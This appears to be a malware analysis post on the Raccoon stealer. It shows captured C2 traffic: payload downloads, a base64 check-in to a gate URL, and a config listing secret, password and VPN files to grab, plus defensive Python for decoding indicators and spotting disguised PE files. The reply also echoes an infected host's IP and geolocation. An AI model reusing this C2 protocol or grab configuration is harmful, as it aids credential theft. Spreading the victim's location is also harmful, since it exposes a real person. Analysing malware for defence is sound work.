This is a recent sample of Raccoon, an information stealer sold as Malware-as-a-Service: a subscription costs about $200 per month. Raccoon had already infected over 100,000 devices and was one of the most frequently mentioned malware families on underground forums in 2019.
For each infected host the malware sends a check-in (the POST to /gate/log.php in the capture below) whose only form field, params, is base64 encoded. Decoding it yields a bot_id made of a GUID-style identifier with the suffix ry4wn, a 40-hex-character config_id, and data=null:
echo "Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=" | base64 -d
bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null
2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, length 397: HTTP: GET /svchost.exe HTTP/1.1
GET /svchost.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 217.8.117.89
Connection: Keep-Alive
2020-05-09 02:34:34.685440 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], ack 398, win 237, length 0
2020-05-09 02:34:34.690750 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], seq 1:1437, ack 398, win 237, length 1436: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 09 May 2020 06:35:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 08 May 2020 06:18:36 GMT
ETag: "83800-5a51cf7a4e700"
Accept-Ranges: bytes
Content-Length: 538624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
2020-05-09 02:34:46.739624 IP 192.168.86.25.56400 > 151.101.0.133.443: Flags [P.], seq 1:130, ack 1, win 16403, length 129
[TLS ClientHello, 129 bytes; server_name extension: raw.githubusercontent.com. The request itself is encrypted; only the SNI and the certificate below are visible in the capture.]
2020-05-09 02:34:46.763774 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], ack 130, win 57, length 0
2020-05-09 02:34:46.764848 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1:1397, ack 130, win 57, length 1396
[TLS ServerHello + Certificate. The server random ends in the "DOWNGRD" sentinel, i.e. a TLS 1.3-capable server settling on TLS 1.2 with this client. Leaf certificate: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=www.github.com; issuer DigiCert SHA2 High Assurance Server CA; valid 2020-05-06 to 2022-04-14; SANs www.github.com, *.github.com, github.com, *.github.io, github.io, *.githubusercontent.com, githubusercontent.com; CRLs at crl3.digicert.com and crl4.digicert.com (sha2-ha-server-g6.crl), OCSP at ocsp.digicert.com.]
2020-05-09 02:34:46.765979 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1397:2793, ack 130, win 57, length 1396
[TLS Certificate, continued: intermediate DigiCert SHA2 High Assurance Server CA, issued by DigiCert High Assurance EV Root CA, valid 2013-10-22 to 2028-10-22.]
2020-05-09 02:34:46.971465 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 1:189, ack 1, win 16685, length 188: HTTP: POST /gate/log.php HTTP/1.1
POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 34.89.22.128
2020-05-09 02:34:46.971475 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 189:344, ack 1, win 16685, length 155: HTTP
params=Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=
2020-05-09 02:34:47.267855 IP 34.89.22.128.80 > 192.168.86.25.56401: Flags [P.], seq 1:1112, ack 344, win 508, length 1111: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 09 May 2020 06:36:06 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
380
{"url":"http://34.89.22.128/file_handler/file.php?hash=196880b27e06197d171bf944d311f8ff63715f76&js=9e862d9b0efd325167e20ad356b9eda91bf37b8d&callback=http://34.89.22.128/gate","attachment_url":"http://34.89.22.128/gate/sqlite3.dll","libraries":"http://34.89.22.128/gate/libs.zip","ip":"73.135.186.44","location":{"country":"United States","country_code":"US","state":"Maryland","state_code":"MD","city":"Catonsville","zip":21228,"latitude":39.2812,"longitude":-76.7406},"config":{"masks":[{"name":12,"subfolders":["true"],"size_limit":40,"mask":"secret.txt, secret.doc, secret.docx, secret*.txt, secret*.doc, secret*.docx, pass.txt, pass.doc, pass.docx, pass*.txt, pass*.doc, pass*.docx, vpn.txt, vpn.doc, vpn.docx, vpn*.txt, vpn*.doc, vpn*.docx, *vpn.txt, *vpn.doc, *vpn.docx","path":"%USERPROFILE%\\"}],"loader_urls":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":1,"depth":3}
0
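To turn the base64 check-in decoded at the top of the post and the JSON reply above into something a responder can act on, here is an added Python example (mine, not part of the original post and not the malware's own code). It decodes the params field, splits bot_id and config_id, and pulls the download URLs, the victim IP the C2 echoed back, the grab settings and the file masks out of the config. The check-in body and the JSON are copied from the capture; treating the masks as case-insensitive Windows-style wildcards (fnmatch) is my assumption, since the stealer's own matcher is not visible here, and size_limit and depth are passed through as the raw numbers because the page does not give their units.

```python
import base64
import json
import re
from fnmatch import translate
from urllib.parse import parse_qs, urlsplit

# Check-in body of the POST /gate/log.php above, copied from the capture.
CHECKIN_BODY = (
    "params=Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw="
)

# Chunk body of the C2 reply above (chunk framing "380" / "0" stripped), copied from the capture.
C2_REPLY = (
    r'{"url":"http://34.89.22.128/file_handler/file.php?hash=196880b27e06197d171bf944d311f8ff63715f76'
    r'&js=9e862d9b0efd325167e20ad356b9eda91bf37b8d&callback=http://34.89.22.128/gate",'
    r'"attachment_url":"http://34.89.22.128/gate/sqlite3.dll","libraries":"http://34.89.22.128/gate/libs.zip",'
    r'"ip":"73.135.186.44","location":{"country":"United States","country_code":"US","state":"Maryland",'
    r'"state_code":"MD","city":"Catonsville","zip":21228,"latitude":39.2812,"longitude":-76.7406},'
    r'"config":{"masks":[{"name":12,"subfolders":["true"],"size_limit":40,'
    r'"mask":"secret.txt, secret.doc, secret.docx, secret*.txt, secret*.doc, secret*.docx, '
    r'pass.txt, pass.doc, pass.docx, pass*.txt, pass*.doc, pass*.docx, vpn.txt, vpn.doc, vpn.docx, '
    r'vpn*.txt, vpn*.doc, vpn*.docx, *vpn.txt, *vpn.doc, *vpn.docx","path":"%USERPROFILE%\\"}],'
    r'"loader_urls":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":1,"depth":3}'
)


def decode_checkin(body: str) -> dict:
    """Decode the params= field of a Raccoon check-in into its key/value pairs."""
    # Take the raw field instead of running the outer body through parse_qs(): the bot
    # sends the base64 unescaped, and a form parser would turn any '+' into a space.
    field = body.split("params=", 1)[1]
    decoded = base64.b64decode(field).decode("ascii")
    kv = {k: v[0] for k, v in parse_qs(decoded, keep_blank_values=True).items()}
    # bot_id is "<GUID-style id>_<suffix>"; split on the last underscore (assumed layout).
    machine_id, _, suffix = kv["bot_id"].rpartition("_")
    kv["machine_id"] = machine_id
    kv["bot_suffix"] = suffix
    return kv


def parse_config(reply_text: str) -> dict:
    """Extract IOCs and grab settings from the JSON the C2 returns to a check-in."""
    cfg = json.loads(reply_text)
    stage_query = parse_qs(urlsplit(cfg["url"]).query)
    urls = [cfg["url"], cfg["attachment_url"], cfg["libraries"], stage_query["callback"][0]]
    urls += cfg["config"].get("loader_urls") or []   # null in this capture
    masks = []
    for rule in cfg["config"]["masks"]:
        for pattern in rule["mask"].split(","):
            pattern = pattern.strip()
            if pattern:
                # Assumption: masks behave like case-insensitive Windows wildcards.
                masks.append(re.compile(translate(pattern), re.IGNORECASE))
    return {
        "hosts": {urlsplit(u).hostname for u in urls},
        "urls": urls,
        "payload_hash": stage_query["hash"][0],      # 40 hex chars in the capture
        "callback": stage_query["callback"][0],
        "victim_ip": cfg["ip"],                      # the C2's view of the infected host
        "screenshots": bool(cfg["is_screen_enabled"]),
        "browser_history": bool(cfg["is_history_enabled"]),
        "grab_depth": cfg["depth"],                  # raw value; units not given on the page
        "size_limit": cfg["config"]["masks"][0]["size_limit"],
        "masks": masks,
    }


def matches_mask(filename: str, masks: list) -> bool:
    """Would a file with this name be picked up by the grabber config?"""
    return any(m.match(filename) for m in masks)


if __name__ == "__main__":
    ci = decode_checkin(CHECKIN_BODY)
    print("bot_id   :", ci["bot_id"])
    print("config_id:", ci["config_id"])
    cfg = parse_config(C2_REPLY)
    print("C2 hosts :", sorted(cfg["hosts"]))
    for u in cfg["urls"]:
        print("   ", u)
    for name in ("vpn_credentials.txt", "passwords.docx", "notes.txt"):
        print(f"{name!r} would be grabbed: {matches_mask(name, cfg['masks'])}")
```

The hosts set and the URL list are what goes into a blocklist; the masks tell you which files on the victim's profile should be treated as exposed, which is the part of the config that usually matters most for the incident write-up.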
2020-05-09 02:34:47.290435 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [S], seq 222080979, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-09 02:34:47.409675 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [S.], seq 1599144664, ack 222080980, win 65320, options [mss 1420,nop,nop,sackOK,nop,wscale 7], length 0
2020-05-09 02:34:47.409919 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [.], ack 1, win 16685, length 0
2020-05-09 02:34:47.413914 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [P.], seq 1:268, ack 1, win 16685, length 267: HTTP: GET /gate/sqlite3.dll HTTP/1.1
GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.89.22.128
Connection: Keep-Alive
2020-05-09 02:34:47.600549 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [.], seq 1:1421, ack 268, win 509, length 1420: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 09 May 2020 06:36:06 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT
ETag: "5c8ff6ea-dfcff"
Accept-Ranges: bytes
[body begins: MZ header followed by the DOS stub "This program cannot be run in DOS mode."; despite the application/octet-stream Content-Type, the 916,735-byte sqlite3.dll is a PE file]
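Both plaintext downloads in this capture, svchost.exe served as application/x-msdos-program and sqlite3.dll served as application/octet-stream, start with the MZ header and DOS stub seen in the last packet. The added Python example below (mine, not from the original post) splits an HTTP response into headers and body, recognises a PE image by its structure rather than by the server's Content-Type, reads the COFF header to tell a DLL from an EXE and report the target machine, and flags a PE arriving under a MIME type that does not declare one. The response headers are copied from the sqlite3.dll reply; the PE body is a minimal hand-built image, since the capture only shows the first packet of the real file, and the allow-list of "honest" PE MIME types is my assumption.

```python
import struct

# Response headers copied from the GET /gate/sqlite3.dll reply in the capture.
SQLITE_RESPONSE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.14.0 (Ubuntu)\r\n"
    b"Date: Sat, 09 May 2020 06:36:06 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 916735\r\n"
    b"Connection: keep-alive\r\n"
    b"Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT\r\n"
    b'ETag: "5c8ff6ea-dfcff"\r\n'
    b"Accept-Ranges: bytes\r\n"
    b"\r\n"
)

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."

# MIME types that honestly declare a Windows executable (assumed allow-list for the mismatch check).
PE_MIME_TYPES = {
    "application/x-msdos-program",
    "application/x-msdownload",
    "application/vnd.microsoft.portable-executable",
}

MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARMv7", 0xAA64: "ARM64"}
IMAGE_FILE_DLL = 0x2000


def build_fake_pe(machine: int = 0x014C, characteristics: int = 0x2102) -> bytes:
    """Constructed stand-in for the real DLL body: MZ header, DOS stub, PE signature, COFF header."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)      # e_lfanew: offset of "PE\0\0"
    stub = DOS_STUB_TEXT + b"\r\n$"
    dos[0x40:0x40 + len(stub)] = stub                 # stub sits right after the 64-byte DOS header
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (0x2102 = DLL | EXECUTABLE | 32BIT)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


def split_http_response(raw: bytes) -> tuple:
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def classify_pe(body: bytes) -> dict:
    """Identify a PE image by its structure, ignoring whatever the server claimed."""
    info = {"is_pe": False, "dos_stub": False, "machine": None, "is_dll": None}
    if len(body) < 0x40 or body[:2] != b"MZ":
        return info
    info["dos_stub"] = DOS_STUB_TEXT in body[:0x200]
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info          # MZ without a reachable PE signature: DOS program or truncated capture
    machine, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    info["is_pe"] = True
    info["machine"] = MACHINE_NAMES.get(machine, hex(machine))
    info["is_dll"] = bool(chars & IMAGE_FILE_DLL)
    return info


def inspect_download(raw: bytes) -> dict:
    """Combine the header claims with the body facts; flag a PE hiding behind a non-PE Content-Type."""
    _, headers, body = split_http_response(raw)
    result = classify_pe(body)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    result["content_type"] = ctype
    result["declared_length"] = int(headers.get("content-length", "0"))
    result["mime_mismatch"] = result["is_pe"] and ctype not in PE_MIME_TYPES
    return result


if __name__ == "__main__":
    verdict = inspect_download(SQLITE_RESPONSE_HEAD + build_fake_pe())
    for key, value in verdict.items():
        print(f"{key:16} {value}")
```

The check deliberately reads e_lfanew and the PE signature rather than stopping at "MZ": a bare MZ match also fires on DOS programs and on the first packet of a truncated transfer, which the classifier reports as not-a-PE while still noting the DOS stub text.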